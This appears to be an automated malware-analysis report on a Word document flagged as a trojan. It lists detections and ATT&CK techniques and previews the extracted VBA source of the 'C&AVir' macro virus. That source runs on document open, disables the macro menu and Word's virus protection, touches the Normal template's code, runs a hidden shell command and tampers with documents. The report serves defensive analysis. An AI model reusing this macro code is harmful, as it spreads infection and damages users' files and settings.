MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function for execution. This indicates an attempt to run arbitrary code, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Marker-42' further supports the malicious nature of the file.
Heuristics 5
-
ClamAV: Doc.Trojan.Marker-42 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-42
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43028 bytes |
SHA-256: 58cfff28744de287b3bc96c5e0ada06cb0d1543a45e314d35226e80869dd5677 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'New Era of C&AVir. More Powerfull
On Error Resume Next
Dim Sw_Doc_Infec, Sw_Pln_Infec, Activa_Doc, Activa_Pln, Acci_Arch, Rompe As Boolean
Dim Dc, Pl As Object
Dim linwork, LCDoc, LCPln, parchi, pext, pext1, docum As String
Dim Accion1, Accion2, LinDoc, LinPln, Compara As Integer
Const cyav = "Este Es <C&AVir>"
Const pnomus = "***< C & A V i r >***"
'Inicializa Variables
Sw_Doc_Infec = False
Sw_Pln_Infec = False
Activa_Doc = True
Activa_Pln = False
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
Options.VirusProtection = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Options.CreateBackup = (1 - 1)
Set Dc = ActiveDocument.VBProject.VbComponents.Item(1)
Set Pl = NormalTemplate.VBProject.VbComponents.Item(1)
LinPln = Pl.CodeModule.Countoflines
LinDoc = Dc.CodeModule.Countoflines
Sw_Pln_Infec = Pl.CodeModule.Find(cyav, 1, 1, 10000, 10000)
Sw_Doc_Infec = Dc.CodeModule.Find(cyav, 1, 1, 10000, 10000)
Acci_Arch = False
Randomize
If Activa_Doc = True Then
If Date > 36433 Then
Dia = Day(Date)
If Dia = 1 Then
Ptp = Int(6 * Rnd)
Select Case Ptp
Case 1
Acci_Arch = True
pext = "*.doc"
pext1 = "1"
Case 2
Acci_Arch = True
pext = "*.bat"
pext1 = "2"
Case 3
Acci_Arch = True
pext = "*.sys"
pext1 = "3"
Case 4
Acci_Arch = False
pext = ""
pext1 = ""
Case 5
Acci_Arch = True
pext = "*.ini"
pext1 = "4"
End Select
If Acci_Arch = True Then
parchi = "IOBuff" & pext1 & ".vxd"
Shell "command.com /c dir \" & pext & "/s/b>>\" & parchi, vbHide
End If
End If
DiaSem = WeekDay(Date)
DiaSem = DiaSem + 3
Hacer = Int(DiaSem * Rnd)
If Hacer = Day(Now) Or (Hacer * 3) = Minute(Now) Then
Select Case Hacer
Case 1
Options.BlueScreen = True
Options.CheckGrammarAsYouType = False
Options.CheckSpellingAsYouType = False
ActiveDocument.ShowGrammaticalErrors = False
ActiveDocument.ShowSpellingErrors = False
ActiveDocument.CommandBars.LargeButtons = True
Application.ActiveWindow.DisplayVerticalScrollBar = False
Case 2
With ActiveDocument.PageSetup.LineNumbering
.Active = True
.StartingNumber = 3
.CountBy = 3
.RestartMode = wdRestartSection
End With
ActiveDocument.Save
If ActiveDocument.CommandBars.LargeButtons = True Then ActiveDocument.CommandBars.LargeButtons = False
ActiveDocument.ActiveWindow.Caption = ActiveDocument.ActiveWindow.Caption & " - Pura Basura!!"
If ActiveDocument.Saved = False Then ActiveDocument.Save
Case 3
With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).PageNumbers
.NumberStyle = wdPageNumberStyleLowercaseRoman
.IncludeChapterNumber = True
.RestartNumberingAtSection = True
.StartingNumber = 99
.Add PageNumberAlignment:=wdAlignPageNumberCenter, FirstPage:=True
End With
Application.ActiveWindow.DisplayHorizontalScrollBar = False
Application.ActiveWindow.DisplayVerticalScrollBar = False
If ActiveDocument.Saved = False Then ActiveDocument.Save
If Options.BlueScreen = True Then Options.BlueScreen
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.